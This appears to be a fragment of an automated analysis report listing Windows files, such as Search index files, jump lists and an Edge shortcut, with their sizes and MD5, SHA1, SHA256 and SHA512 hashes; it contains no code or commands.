Filesize101KB
MD5003ece80b3820c43eb83878928b8469d
SHA1790af92ff0eb53a926412e16113c5d35421c0f42
SHA25612d00eee26e5f261931e51cfa56e04c54405eb32d1c4b440e35bd2b48d5fcf07
SHA512b2d6d9b843124f5e8e06a35a89e34228af9e05cbfa2ae1fe3d9bc4ddbebda4d279ce52a99066f2148817a498950e37a7f0b73fe477c0c6c39c7016aa647079a5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cab5e9b9-e4d6-45a2-9cf6-3efe6285179f}\0.0.filtertrie.intermediate.txt
Filesize204KB
MD51218ebe70d824d15d5aa68a5a9541061
SHA1dcf1eb20e350be0ca52750c2556b11451b03b4f1
SHA2567248cbb608da104f578ff7d67d94798cb30448a324a7f34025010d21ff832dfc
SHA51241f47e1cd0daff4e2588a1da62bd3b88407c76b907513f42b1e51a24b76700645ce7bd338004944a1206d16d1c78f7731c9fb23e004d069cd6d2100ed61355e2
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cab5e9b9-e4d6-45a2-9cf6-3efe6285179f}\0.1.filtertrie.intermediate.txt
Filesize5B
MD534bd1dfb9f72cf4f86e6df6da0a9e49a
SHA15f96d66f33c81c0b10df2128d3860e3cb7e89563
SHA2568e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c
SHA512e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cab5e9b9-e4d6-45a2-9cf6-3efe6285179f}\0.2.filtertrie.intermediate.txt
Filesize5B
MD5c204e9faaf8565ad333828beff2d786e
SHA17d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1
SHA256d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f
SHA512e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cab5e9b9-e4d6-45a2-9cf6-3efe6285179f}\Settings.ft
Filesize224KB
MD505cca5ef9d491f3640d1db368768e43f
SHA13ed5bd4fe776ec61964b2a2ad33105d22f2d33ed
SHA2560dcbbab78cad414ce9ebc49f7643835fc414e934b45909d667a3bdf0061e8af4
SHA512082a7e969a919dd503b0e2853e3ab2d1a4f029115bbaf373fe1c796bc667c8e47d5c0e850636c1331ab978436d7047343396294fdd8537750fa02469a10bff92
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cab5e9b9-e4d6-45a2-9cf6-3efe6285179f}\Settings.index
Filesize1.4MB
MD56e89eeec56ec057baf9787072f3aa4ee
SHA165dfa210105a981a8da3dea1008e1d0eeaf337af
SHA256aa140df41bf17e2ffb03a8934f9e8675a7ccfe23fa07cc39a35685ec1ca07807
SHA5128c71fccd24e8b340f479deebd3b05aec440774041d44183532436f905acc0133ee4660d66c042a333d411202011d7d5e5b7b9740af2b505af55b9ed2d4d67488
-
Filesize
92KB
MD58fd36288c6c2977a056bce524010dfdc
SHA1431f2a45c67441a15a8f86d86664b8760a1cfd34
SHA256828578d9511a494fa357c0cf73d927cb70ada2af5cca2875356109154d7da6e2
SHA512641417d1fcd7f0099e643c58dd060fdd4233197186008341059efa41096b3e344419230d66f67c2b532e33d9414667bb0d2b746191137dea44c5d76c41524a2c
-
Filesize
92KB
MD58fd36288c6c2977a056bce524010dfdc
SHA1431f2a45c67441a15a8f86d86664b8760a1cfd34
SHA256828578d9511a494fa357c0cf73d927cb70ada2af5cca2875356109154d7da6e2
SHA512641417d1fcd7f0099e643c58dd060fdd4233197186008341059efa41096b3e344419230d66f67c2b532e33d9414667bb0d2b746191137dea44c5d76c41524a2c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
Filesize2KB
MD58b17b3cb095116f2d3b727e2b96d026a
SHA14e8f16a7f06abe696fce21035a6cb441c7242750
SHA256b6adeb19d104a755e0bdf019e0d2fd08a487109b321750e75caf125c54b5ebb0
SHA51257bb711d575cd31f6bc0230dc9489e5262dd62b2d1453bc8590653d15eff7c48aafcdbf1a34a71f84e65cc28905304033ae6605d13fc461481b3c9b6c2f17f58
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
Filesize9KB
MD51b034480b7b654227b2306a7fb122b38
SHA11e06eed86b1165932bf27e136b823f654260ec54
SHA256e2883f70d81e1c82f74346b16951e52a8a7cebcf0390906251c7f119c5635e67
SHA51230dedf04885ec2092997770b86572deffc1ca435e3af2735310be65b1508938263b1e2cf4765d1017522f058a14f13ffee22024464d0d4525a729833ff8ec1e0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\ccba5a5986c77e43.automaticDestinations-ms
Filesize3KB
MD5fada752610e0fa488a5c7dc77c8cb7a6
SHA1dc1a85afee013818a778a21d8365734e32487170
SHA25628349580c547a0b1373dfe32d5e60fcaeda9dec4c6d94960c8ed88850a772930
SHA5126e6d5aee52b75a79fe4d15b593960fb2fc44a5a3ef8462b78317cf87e2e07927d506654cbf87e6b8aaef6b098ba2d78d5151dc806ecfab9a14999c2463988d66
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize7KB
MD57c136327e000f00d20327976803aed41
SHA1f487025837a8e3c0496702a941d441d562fb3ec1
SHA256f6674743002965811e2715cb9f79d0d8be4e11c6c0c273e2dc39025bc0cd173a
SHA5122232a8ac9c21878333adb15d29d3d345540a187143c6fbd454f2216baebc2c068293e63884dffc34e1e61c3b4283d20c10e7fa80b221683ddc152987b722a199
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize3KB
MD55d4a41dd28093636117bac95505b1d58
SHA1d5aaeca077f5ae6d16e7423026fc150759ad2a42
SHA2565652582bd8352614fe9e6b891acd8a6c78b4e3e2717692f0b6c0879de6c6d2b4
SHA51298b5247e5260c96695957dbb3394a1dfe8fb4f87d25ec86a14d56b9fa569c9969d6cdcf286c15414131371c32a16a4126c2f60281c4ecd4094e2e1e339676d21
-
Filesize
2KB
MD586d0c89e943a8831f1994e1ca7d634b0
SHA16861ed6cdb117a1c8b951c708576885f6650e5dd
SHA25668628b13345bbd760e91a5f07f3f45472f99f4658484534d9136a332ddd266c7
SHA51281c89c7fc81a3ba460c7f05de92b95ad8edf08e766ea23782c5be8fa6da75d664548a0921ca2dfd19edc7cbf2a1bb4b0b335299024b314fa274750a601f34aad
-
Filesize
13KB
MD58053696d86545d3033eb01c0663aea62
SHA1ad402bb2648ab2a54987c7ad85db9d77b9d88c5e
SHA2567f0889a133b0e2372aec0c027ed879e3586486664d5e5269a2af8712bdcffa57
SHA512a26ff741983ea781feb1cba730fcc94935d32592bbd26ed716ef2b24e5dce0b0f989ce9420bb2104df3ef2d3db3d7d80d5686e6ab9407ed08ee32ce5e86a133c
-
Filesize
25KB
MD58af121c765097e921c36d7c950287bcf
SHA1ab1b797005159034f0f24ed1ed6824bbaaa327f0
SHA256065a4b86881703f00d6680af3211e575f5ae8f73bc9fab444c980aa2aee3aec5
SHA512efa4c2c02b85f67ca8f5d5f51831a7c25a5df37bc412cebce57857dc6049bcfd38b3c24a68cfc959e81cf15611855fb43e2998109c1e4a1a5a29205679d64ce2
-
Filesize
25KB
MD58af121c765097e921c36d7c950287bcf
SHA1ab1b797005159034f0f24ed1ed6824bbaaa327f0
SHA256065a4b86881703f00d6680af3211e575f5ae8f73bc9fab444c980aa2aee3aec5
SHA512efa4c2c02b85f67ca8f5d5f51831a7c25a5df37bc412cebce57857dc6049bcfd38b3c24a68cfc959e81cf15611855fb43e2998109c1e4a1a5a29205679d64ce2
-
Filesize
23.0MB
MD51b8e7c608da3b813f88add272090cd13
SHA13f27b8bf97af863ae2a3988897dd29166ce9686e
SHA2562f5514dbab8699b730da818d14c015e78834c180bb8dc7d24e17ed51736e2a62
SHA512d9ca6aaf439178c457c4a7fbbac3ce269b5d7afd03080ba840da255c3ebde6a1202b1478bd89d099b671f5d706bd3a245ed03185345f48f30e56442c75e312f3
-
\??\Volume{5d2b4a7c-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{2ede7459-d5bf-46e6-b0b2-29d0c2afd150}_OnDiskSnapshotProp
Filesize5KB
MD5506ce9144ec3422fe513c40e4703828f
SHA1e5448a0baa1c87ca2d79f000e2a32ea415854f7a
SHA2560b0cfab62d515293e826512acf4384198e7c544ada1bd97328cf98caa73bc883
SHA512ee4708f39fe5075ca269de2c3bfc3ecf35b0610721cd8bf6749bdfd4c6df87632ae7187d2a0935118e17ebe80fe09d8ff10ae7808083fd8624868e984a681dc8